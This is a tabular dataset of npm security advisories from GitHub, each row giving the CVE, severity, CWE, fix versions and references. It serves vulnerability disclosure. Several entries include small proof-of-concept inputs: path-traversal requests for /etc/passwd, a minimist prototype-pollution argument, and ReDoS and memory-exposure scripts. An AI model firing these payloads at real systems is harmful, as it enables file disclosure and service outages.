ecosystem
stringclasses
14 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
267
details
stringlengths
9
13.5k
aliases
stringlengths
17
144
modified_date
stringdate
2010-05-27 05:47:00
2022-05-10 08:46:52
published_date
stringdate
2005-12-31 05:00:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
988 values
refs
stringlengths
30
17.7k
introduced
stringlengths
75
4.26k
npm
GHSA-432j-4fw9-2g6f
Downloads Resources over HTTP in libsbml
Affected versions of `libsbml` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `libsbml`. ## Recommendation No patch is currently available for this vulnerability, and the package has not seen an update since 2013. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10668'}
2021-01-08T19:57:39Z
2019-02-18T23:44:33Z
HIGH
null
{'CWE-311'}
{'https://www.npmjs.com/advisories/272', 'https://nodesecurity.io/advisories/272', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10668', 'https://github.com/advisories/GHSA-432j-4fw9-2g6f'}
null
npm
GHSA-g7mq-rfj2-25wq
Code Injection in total4
The package total4 before 0.0.43 are vulnerable to Arbitrary Code Execution via the U.set() and U.get() functions.
{'CVE-2021-23390'}
2021-07-13T19:43:28Z
2021-12-10T17:26:33Z
CRITICAL
null
{'CWE-94'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23390', 'https://snyk.io/vuln/SNYK-JS-TOTAL4-1130527', 'https://github.com/totaljs/framework4/blob/master/utils.js%23L5430-L5455', 'https://github.com/totaljs/framework4/commit/8a72d8c20f38bbcac031a76a51238aa528f68821'}
null
npm
GHSA-h9x2-5rm7-x4gm
Insecure Comparison in secure-compare
Versions of `secure-compare` prior to 3.0.1 are affected by a vulnerability that results in the package always returning true when comparing two strings of the same length, despite differences in the contents of those strings. ## Recommendation Upgrade to version 3.0.1 or later.
{'CVE-2015-9238'}
2020-08-31T18:09:18Z
2019-06-03T17:28:23Z
HIGH
null
{'CWE-697'}
{'https://nvd.nist.gov/vuln/detail/CVE-2015-9238', 'https://github.com/vdemedes/secure-compare/pull/1', 'https://www.npmjs.com/advisories/50', 'https://nodesecurity.io/advisories/50'}
null
npm
GHSA-rc3x-jf5g-xvc5
Open redirect in karma
Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.
{'CVE-2021-23495'}
2022-03-09T21:08:20Z
2022-02-26T00:00:38Z
MODERATE
null
{'CWE-601'}
{'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2412347', 'https://github.com/karma-runner/karma', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23495', 'https://github.com/karma-runner/karma/commit/ff7edbb2ffbcdd69761bece86b7dc1ef0740508d', 'https://snyk.io/vuln/SNYK-JS-KARMA-2396325'}
null
npm
GHSA-qq89-hq3f-393p
Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links
### Impact Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained two directories and a symlink with names containing unicode values that normalized to the same value. Additionally, on Windows systems, long path portions would resolve to the same file system entities as their 8.3 "short path" counterparts. A specially crafted tar archive could thus include directories with two forms of the path that resolve to the same file system entity, followed by a symbolic link with a name in the first form, lastly followed by a file using the second form. It led to bypassing node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. The v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below. ### Patches 6.1.9 || 5.0.10 || 4.4.18 ### Workarounds Users may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links. ```js const tar = require('tar') tar.x({ file: 'archive.tgz', filter: (file, entry) => { if (entry.type === 'SymbolicLink') { return false } else { return true } } }) ``` Users are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves. #### Fix The problem is addressed in the following ways, when comparing paths in the directory cache and path reservation systems: 1. The `String.normalize('NFKD')` method is used to first normalize all unicode to its maximally compatible and multi-code-point form. 2. All slashes are normalized to `/` on Windows systems (on posix systems, `\` is a valid filename character, and thus left intact). 3. When a symbolic link is encountered on Windows systems, the entire directory cache is cleared. Collisions related to use of 8.3 short names to replace directories with other (non-symlink) types of entries may make archives fail to extract properly, but will not result in arbitrary file writes.
{'CVE-2021-37712'}
2021-08-31T16:02:04Z
2021-08-31T16:05:17Z
HIGH
null
{'CWE-59', 'CWE-22'}
{'https://www.npmjs.com/package/tar', 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/npm/node-tar/security/advisories/GHSA-qq89-hq3f-393p', 'https://www.debian.org/security/2021/dsa-5008', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37712', 'https://github.com/npm/node-tar'}
null
npm
GHSA-xg59-m7wx-853q
Cross-site Scripting in node-red-dashboard
It is possible to inject JavaScript within node-red-dashboard versions prior to version 2.17.0 due to the ui_notification node accepting raw HTML by default.
{'CVE-2019-10756'}
2021-08-18T22:03:52Z
2019-10-25T19:41:24Z
MODERATE
null
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-10756', 'https://snyk.io/vuln/SNYK-JS-NODEREDDASHBOARD-471939'}
null
npm
GHSA-hgjh-723h-mx2j
Authorization Bypass Through User-Controlled Key in url-parse
url-parse prior to version 1.5.8 is vulnerable to Authorization Bypass Through User-Controlled Key.
{'CVE-2022-0686'}
2022-03-03T19:19:03Z
2022-02-21T00:00:21Z
CRITICAL
null
{'CWE-639'}
{'https://huntr.dev/bounties/55fd06cd-9054-4d80-83be-eb5a454be78c', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0686', 'https://github.com/unshiftio/url-parse', 'https://security.netapp.com/advisory/ntap-20220325-0006/', 'https://github.com/unshiftio/url-parse/commit/d5c64791ef496ca5459ae7f2176a31ea53b127e5'}
null
npm
GHSA-frcq-4ffq-v4mw
Directory Traversal in lessindex
Affected versions of `lessindex` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16211'}
2020-08-31T18:22:33Z
2020-09-01T18:12:07Z
HIGH
null
{'CWE-22'}
{'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/lessindex', 'https://www.npmjs.com/advisories/423', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16211', 'https://nodesecurity.io/advisories/423'}
null
npm
GHSA-4vvp-x9h2-x2vf
Path Traversal in public
All versions of `public` are vulnerable to Path Traversal. This vulnerability allows an attacker to access files outside the webroot since it allows symlink navigation in the URL. ## Recommendation No fix is currently available. Do not use `public` in production or consider using an alternative module until a fix is made available.
null
2020-08-31T18:48:53Z
2020-09-03T20:26:39Z
MODERATE
null
{'CWE-22'}
{'https://hackerone.com/reports/593911', 'https://www.npmjs.com/advisories/1144'}
null
npm
GHSA-9m4x-8w29-r78g
Server-Side Request Forgery in @uppy/companion
The @uppy/companion npm package before versions 1.13.2 and 2.0.0-alpha.5 is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability, which allows an attacker to scan local or external networks or otherwise interact with internal systems.
{'CVE-2020-8205'}
2020-08-13T18:54:01Z
2020-08-13T18:54:19Z
MODERATE
null
{'CWE-918'}
{'https://hackerone.com/reports/891270', 'https://github.com/transloadit/uppy/blob/master/CHANGELOG.md#1161', 'https://github.com/transloadit/uppy/pull/2322/commits/dbf2f4f30aeaf3bcc5971bb867bb0b5984084828', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8205'}
null
npm
GHSA-hm82-qr45-h7mw
Improperly Controlled Modification of Dynamically-Determined Object Attributes in field
Prototype pollution vulnerability in 'field' versions 0.0.1 through 1.0.1 allows attacker to cause a denial of service and may lead to remote code execution.
{'CVE-2020-28269'}
2021-07-26T18:23:15Z
2021-12-10T17:22:58Z
CRITICAL
null
{'CWE-915'}
{'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28269', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28269', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28269,', 'https://github.com/jprichardson/field/blob/2a3811dfc4cdd13833977477d2533534fc61ce06/lib/field.js#L39'}
null
npm
GHSA-4g46-5grc-wq49
Cross-Site Scripting in seeftl
All versions of `seeftl` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code. ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.
{'CVE-2019-15603'}
2020-08-31T18:59:46Z
2020-04-01T16:36:31Z
HIGH
null
{'CWE-79'}
{'https://www.npmjs.com/advisories/1451', 'https://hackerone.com/reports/665302', 'https://nvd.nist.gov/vuln/detail/CVE-2019-15603'}
null
npm
GHSA-f78f-353m-cf4j
Code Injection in node-rules
node-rules including 3.0.0 and prior to 5.0.0 allows injection of arbitrary commands. The argument rules of function "fromJSON()" can be controlled by users without any sanitization.
{'CVE-2020-7609'}
2021-07-29T16:13:17Z
2021-12-10T20:05:37Z
CRITICAL
null
{'CWE-94'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7609', 'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832', 'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832,', 'https://snyk.io/vuln/SNYK-JS-NODERULES-560426'}
null
npm
GHSA-5379-r78w-42h2
Unlimited transforms allowed for signed nodes
### Impact A malicious SAML payload can require transforms that consume significant system resources to process, thereby resulting in reduced or denied service. This would be an effective way to perform a denial-of-service attack. ### Patches This has been resolved in version 3.1.0. The resolution is to limit the number of allowable transforms to 2. ### References https://github.com/node-saml/passport-saml/pull/595
{'CVE-2021-39171'}
2021-08-27T23:25:28Z
2021-08-30T16:11:57Z
MODERATE
null
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-39171', 'https://github.com/node-saml/passport-saml/pull/595', 'https://github.com/node-saml/passport-saml/security/advisories/GHSA-5379-r78w-42h2', 'https://github.com/node-saml/passport-saml'}
null
npm
GHSA-hpcf-8vf9-q4gj
XSS in dialog closeText in jquery-ui
Affected versions of `jquery-ui` are vulnerable to a cross-site scripting vulnerability when arbitrary user input is supplied as the value of the `closeText` parameter in the `dialog` function. jQuery-UI is a library for manipulating UI elements via jQuery. Version 1.11.4 has a cross site scripting (XSS) vulnerability in the `closeText` parameter of the `dialog` function. If your application passes user input to this parameter, it may be vulnerable to XSS via this attack vector. ## Recommendation Upgrade to jQuery-UI 1.12.0 or later.
{'CVE-2016-7103'}
2022-02-08T22:08:49Z
2017-10-24T18:33:35Z
HIGH
null
{'CWE-79'}
{'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E2I4UHPIW26FIALH7GGZ3IYUUA53VOOJ/', 'http://rhn.redhat.com/errata/RHSA-2016-2932.html', 'https://github.com/jquery/jquery-ui/commit/9644e7bae9116edaf8d37c5b38cb32b892f10ff6', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://www.npmjs.com/advisories/127', 'http://www.securityfocus.com/bid/104823', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html', 'https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3Ccommits.roller.apache.org%3E', 'https://www.drupal.org/sa-core-2022-002', 'https://nvd.nist.gov/vuln/detail/CVE-2016-7103', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html', 'https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E', 'http://rhn.redhat.com/errata/RHSA-2016-2933.html', 'https://github.com/jquery/jquery-ui', 'https://jqueryui.com/changelog/1.12.0/', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'http://rhn.redhat.com/errata/RHSA-2017-0161.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://github.com/advisories/GHSA-hpcf-8vf9-q4gj', 'https://github.com/jquery/jquery-ui/pull/1622', 'https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html', 'https://github.com/jquery/api.jqueryui.com/issues/281', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://security.netapp.com/advisory/ntap-20190416-0007/', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://nodesecurity.io/advisories/127', 'https://www.tenable.com/security/tns-2016-19'}
null
npm
GHSA-q24h-5rq3-63j9
Incorrect Authorization in @uppy/companion
@uppy/companion prior to version 3.3.1 is vulnerable to incorrect authorization. A user with URL upload access could enumerate internal companion server networks, send local webservers files to the destination server, and finally download them If each of these files had a guessable and regular name.
{'CVE-2022-0528'}
2022-03-10T21:57:56Z
2022-03-04T00:00:19Z
HIGH
null
{'CWE-863', 'CWE-200'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0528', 'https://github.com/transloadit/uppy', 'https://github.com/transloadit/uppy/commit/267c34045a1e62c98406d8c31261c604a11e544a', 'https://huntr.dev/bounties/8b060cc3-2420-468e-8293-b9216620175b'}
null
npm
GHSA-hxm2-r34f-qmc5
Regular Expression Denial of Service in minimatch
Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`. ## Proof of Concept ``` var minimatch = require(“minimatch”); // utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; } var exploit = “[!” + genstr(1000000, “\\”) + “A”; // minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ``` ## Recommendation Update to version 3.0.2 or later.
{'CVE-2016-10540'}
2021-06-10T23:23:41Z
2018-10-09T00:40:41Z
HIGH
null
{'CWE-400'}
{'https://github.com/advisories/GHSA-hxm2-r34f-qmc5', 'https://nodesecurity.io/advisories/118', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10540', 'https://www.npmjs.com/advisories/118'}
null
npm
GHSA-m93v-9qjc-3g79
Context isolation bypass via leaked cross-context objects in Electron
### Impact Apps using `contextIsolation` are affected. This is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions. ### Workarounds There are no app-side workarounds, you must update your Electron version to be protected. ### Fixed Versions * `9.0.0-beta.21` * `8.2.4` * `7.2.4` ### Non-Impacted Versions * `9.0.0-beta.*` ### For more information If you have any questions or comments about this advisory: * Email us at [security@electronjs.org](mailto:security@electronjs.org)
{'CVE-2020-4076'}
2021-01-07T23:48:11Z
2020-07-07T00:01:07Z
HIGH
null
{'CWE-501'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-4076', 'https://github.com/electron/electron/security/advisories/GHSA-m93v-9qjc-3g79', 'https://www.electronjs.org/releases/stable?page=3#release-notes-for-v824'}
null
npm
GHSA-wv26-rj8c-4r33
Moderate severity vulnerability that affects auth0-js
CSRF exists in the Auth0 authentication service through 14591 if the Legacy Lock API flag is enabled.
{'CVE-2018-6874'}
2021-09-21T21:53:18Z
2018-11-06T23:15:13Z
HIGH
null
{'CWE-352'}
{'http://www.securityfocus.com/bid/103695', 'https://github.com/advisories/GHSA-wv26-rj8c-4r33', 'https://nvd.nist.gov/vuln/detail/CVE-2018-6874', 'https://auth0.com/docs/security/bulletins/cve-2018-6874'}
null
npm
GHSA-8w65-xjc5-9w79
Cross-Site Scripting in node-red
Versions of `node-red` prior to 0.20.8are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize the `name` field in new Flows, allowing attackers to execute arbitrary JavaScript in the victim's browser. ## Recommendation Upgrade to version 0.18.6 or later.
{'CVE-2019-15607'}
2020-08-31T18:59:55Z
2020-01-30T21:00:21Z
MODERATE
null
{'CWE-79'}
{'https://hackerone.com/reports/681986', 'https://www.npmjs.com/advisories/1456', 'https://nvd.nist.gov/vuln/detail/CVE-2019-15607'}
null
npm
GHSA-4jqc-8m5r-9rpr
Prototype Pollution in set-value
This affects the package `set-value` before 2.0.1, and starting with 3.0.0 but prior to 4.0.1. A type confusion vulnerability can lead to a bypass of CVE-2019-10747 when the user-provided keys used in the path parameter are arrays.
{'CVE-2021-23440'}
2022-03-30T21:18:05Z
2021-09-13T20:09:36Z
HIGH
null
{'CWE-843', 'CWE-1321'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23440', 'https://github.com/jonschlinkert/set-value/pull/33', 'https://github.com/jonschlinkert/set-value', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1584212', 'https://www.huntr.dev/bounties/2eae1159-01de-4f82-a177-7478a408c4a2/', 'https://snyk.io/vuln/SNYK-JS-SETVALUE-1540541', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://github.com/jonschlinkert/set-value/commit/7cf8073bb06bf0c15e08475f9f952823b4576452'}
null
npm
GHSA-vh95-rmgr-6w4m
Prototype Pollution in minimist
Affected versions of `minimist` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects. Parsing the argument `--__proto__.y=Polluted` adds a `y` property with value `Polluted` to all objects. The argument `--__proto__=Polluted` raises and uncaught error and crashes the application. This is exploitable if attackers have control over the arguments being passed to `minimist`. ## Recommendation Upgrade to versions 0.2.1, 1.2.3 or later.
{'CVE-2020-7598'}
2022-04-26T21:01:40Z
2020-04-03T21:48:32Z
MODERATE
null
{'CWE-1321'}
{'https://www.npmjs.com/advisories/1179', 'http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00024.html', 'https://snyk.io/vuln/SNYK-JS-MINIMIST-559764', 'https://github.com/substack/minimist', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7598', 'https://github.com/substack/minimist/commit/38a4d1caead72ef99e824bb420a2528eec03d9ab', 'https://github.com/substack/minimist/commit/63e7ed05aa4b1889ec2f3b196426db4500cbda94', 'https://github.com/substack/minimist/commit/4cf1354839cb972e38496d35e12f806eea92c11f#diff-a1e0ee62c91705696ddb71aa30ad4f95'}
null
npm
GHSA-h698-r4hm-w94p
Validation Bypass in paypal-ipn
Versions 2.x.x and earlier of `paypal-ipn` are affected by a validation bypass vulnerability. paypal-ipn uses the `test_ipn` parameter (which is set by the PayPal IPN simulator) to determine if it should use the production PayPal site or the sandbox. A motivated attacker could craft a request string using the simulator to fool the application into entering the sandbox mode, potentially allowing purchases without valid payment. ## Recommendation Upgrade to version 3.0.0 or later.
{'CVE-2014-10067'}
2021-09-23T20:58:30Z
2020-08-31T22:54:56Z
MODERATE
null
{'CWE-287'}
{'https://github.com/andzdroid/paypal-ipn/issues/11', 'https://nvd.nist.gov/vuln/detail/CVE-2014-10067', 'https://www.npmjs.com/advisories/26', 'https://github.com/andzdroid/paypal-ipn', 'https://nodesecurity.io/advisories/26'}
null
npm
GHSA-j67m-jg9p-ppg4
Malicious Package in ns-sha3
Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user. ## Recommendation Remove the package from your environment. Ensure no Ethereum funds were compromised.
null
2021-10-01T16:10:45Z
2020-09-03T23:18:05Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1298'}
null
npm
GHSA-2gjg-5x33-mmp2
Path Traversal in localhost-now
Versions of `localhost-now` before 1.0.2 are vulnerable to path traversal. This allows a remote attacker to read the content of an arbitrary file. ## Recommendation Update to version 1.0.2 or later.
{'CVE-2018-3729'}
2020-08-31T18:28:41Z
2018-07-25T22:44:05Z
HIGH
null
{'CWE-22'}
{'https://github.com/DCKT/localhost-now/commit/30b004c7f145d677df8800a106c2edc982313995#diff-b9cfc7f2cdf78a7f4b91a753d10865a2', 'https://www.npmjs.com/advisories/582', 'https://hackerone.com/reports/312889', 'https://github.com/advisories/GHSA-2gjg-5x33-mmp2', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3729'}
null
npm
GHSA-x5pg-88wf-qq4p
Regular Expression Denial of Service in marked
Affected versions of `marked` are vulnerable to a regular expression denial of service. The amplification in this vulnerability is significant, with 1,000 characters resulting in the event loop being blocked for around 6 seconds. ## Recommendation Update to version 0.3.9 or later.
{'CVE-2017-16114'}
2020-08-31T18:26:39Z
2018-07-24T20:10:52Z
HIGH
null
{'CWE-400'}
{'https://nodesecurity.io/advisories/531', 'https://github.com/advisories/GHSA-x5pg-88wf-qq4p', 'https://github.com/chjj/marked/issues/937', 'https://www.npmjs.com/advisories/531', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16114'}
null
npm
GHSA-m69q-pmxg-vqch
Directory Traversal in cypserver
Affected versions of `cypserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16191'}
2020-08-31T18:23:13Z
2020-09-01T18:26:00Z
HIGH
null
{'CWE-22'}
{'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/cypserver', 'https://www.npmjs.com/advisories/440', 'https://nodesecurity.io/advisories/440', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16191'}
null
npm
GHSA-7xf6-cpxm-5mx9
Malicious Package in bufner-xor
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user. ## Recommendation Remove the package from your environment. Ensure no Ethereum funds were compromised.
null
2021-09-29T21:35:53Z
2020-09-03T22:27:18Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1264'}
null
npm
GHSA-jh2m-j8pp-55rc
Prototype Pollution in gedi
All versions of package gedi up to and including version 1.6.3 are vulnerable to Prototype Pollution via the set function.
{'CVE-2020-7727'}
2021-05-05T18:26:34Z
2021-05-06T18:12:47Z
CRITICAL
null
{'CWE-1321'}
{'https://snyk.io/vuln/SNYK-JS-GEDI-598803', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7727'}
null
npm
GHSA-c36v-fmgq-m8hx
Prototype Pollution in immer
immer is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
{'CVE-2021-3757'}
2021-09-03T20:17:21Z
2021-09-07T22:57:14Z
HIGH
null
{'CWE-915', 'CWE-1321'}
{'https://github.com/immerjs/immer', 'https://huntr.dev/bounties/23d38099-71cd-42ed-a77a-71e68094adfa', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3757', 'https://github.com/immerjs/immer/commit/fa671e55ee9bd42ae08cc239102b665a23958237'}
null
npm
GHSA-vwhc-pww7-72x6
Code Injection in total.js
Total.js framework (npm package total.js) is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. In total.js framework before version 3.4.9, calling the utils.set function with user-controlled values leads to code-injection. This can cause a variety of impacts that include arbitrary code execution. This is fixed in version 3.4.9.
{'CVE-2021-32831'}
2021-08-31T20:25:52Z
2021-09-01T18:24:05Z
HIGH
null
{'CWE-94'}
{'https://securitylab.github.com/advisories/GHSL-2021-066-totaljs-totaljs/', 'https://github.com/totaljs/framework/commit/887b0fa9e162ef7a2dd9cec20a5ca122726373b3', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32831', 'https://www.npmjs.com/package/total.js', 'https://github.com/totaljs/framework/blob/e644167d5378afdc45cb0156190349b2c07ef235/changes.txt#L11', 'https://github.com/totaljs'}
null
npm
GHSA-7xfp-9c55-5vqj
Remote Memory Exposure in request
Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body. ## Proof of Concept ``` var request = require('request'); var http = require('http'); var serveFunction = function (req, res){ req.on('data', function (data) { console.log(data) }); res.end(); }; var server = http.createServer(serveFunction); server.listen(8000); request({ method: "POST", uri: 'http://localhost:8000', multipart: [{body:500}] },function(err,res,body){}); ``` ## Recommendation Update to version 2.68.0 or later
{'CVE-2017-16026'}
2021-01-08T19:13:45Z
2018-11-09T17:44:01Z
MODERATE
null
{'CWE-201'}
{'https://github.com/request/request/issues/1904', 'https://github.com/request/request/pull/2018', 'https://www.npmjs.com/advisories/309', 'https://github.com/advisories/GHSA-7xfp-9c55-5vqj', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16026', 'https://nodesecurity.io/advisories/309'}
null
npm
GHSA-m6w8-fq7v-ph4m
GovernorCompatibilityBravo incorrect ABI encoding may lead to unexpected behavior
### Impact The `GovernorCompatibilityBravo` module may lead to the creation of governance proposals that execute function calls with incorrect arguments due to bad ABI encoding. This happens if the proposal is created using explicit function signatures, e.g. a proposal to invoke the function `foo(uint256)` is created as `propose([target], [0], ["foo(uint256)"], ["0x00..01"])`. If the function selector is provided as part of the encoded proposal data the issue is not present, e.g. the same proposal is created as `propose([target], [0], ["0x2fbebd3800..01"])`, where `2fbebd38` is the function selector. We've assessed the instances of this contract found on chain, and did not find any occurrence of this bug in the past. Proposal creation through Tally or OpenZeppelin Defender is not affected. The core `Governor` contract on its own is not affected. ### Patches A fix is included in version v4.4.2 of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`. ### Workarounds Do not create proposals using explicit function signatures. Instead, use the `propose` function without the `signatures` argument, and create the proposal using the fully ABI-encoded function call including the function selector in the `calldatas` argument as explained above. ### References https://github.com/OpenZeppelin/openzeppelin-contracts/issues/3099 ### Credits This issue was identified and reported by @GeraldHost. ### For more information If you have any questions, comments, or need assistance regarding this advisory, email us at security@openzeppelin.com. To submit security reports please use [our bug bounty on Immunefi](https://immunefi.com/bounty/openzeppelin/).
null
2022-01-12T21:38:27Z
2022-01-13T16:09:36Z
MODERATE
null
null
{'https://github.com/OpenZeppelin/openzeppelin-contracts', 'https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-m6w8-fq7v-ph4m'}
null
npm
GHSA-vcg5-9xw6-r56c
Malicious Package in logsymbles
Version 2.2.0 of `logsymbles` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T21:55:54Z
2020-09-02T21:40:49Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/908'}
null
npm
GHSA-fc42-h7q4-qp8h
Command Injection in killport
This affects the package killport before 1.0.2. If (attacker-controlled) user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization. Running this PoC will cause the command touch success to be executed, leading to the creation of a file called success.
{'CVE-2021-23360'}
2021-03-22T18:24:32Z
2021-04-13T15:16:20Z
HIGH
null
{'CWE-77'}
{'https://github.com/ssnau/killport/commit/bec8e371f170a12e11cd222ffc7a6e1ae9942638', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23360', 'https://github.com/ssnau/killport/blob/5268f23ea8f152e47182b263d8f7ef20c12a9f28/index.js%23L9', 'https://snyk.io/vuln/SNYK-JS-KILLPORT-1078535'}
null
npm
GHSA-v3jv-wrf4-5845
Local Privilege Escalation in npm
Affected versions of `npm` use predictable temporary file names during archive unpacking. If an attacker can create a symbolic link at the location of one of these temporary file names, the attacker can arbitrarily write to any file that the user which owns the `npm` process has permission to write to, potentially resulting in local privilege escalation. ## Recommendation Update to version 1.3.3 or later.
{'CVE-2013-4116'}
2021-09-23T21:38:18Z
2020-09-01T16:03:34Z
LOW
null
{'CWE-59'}
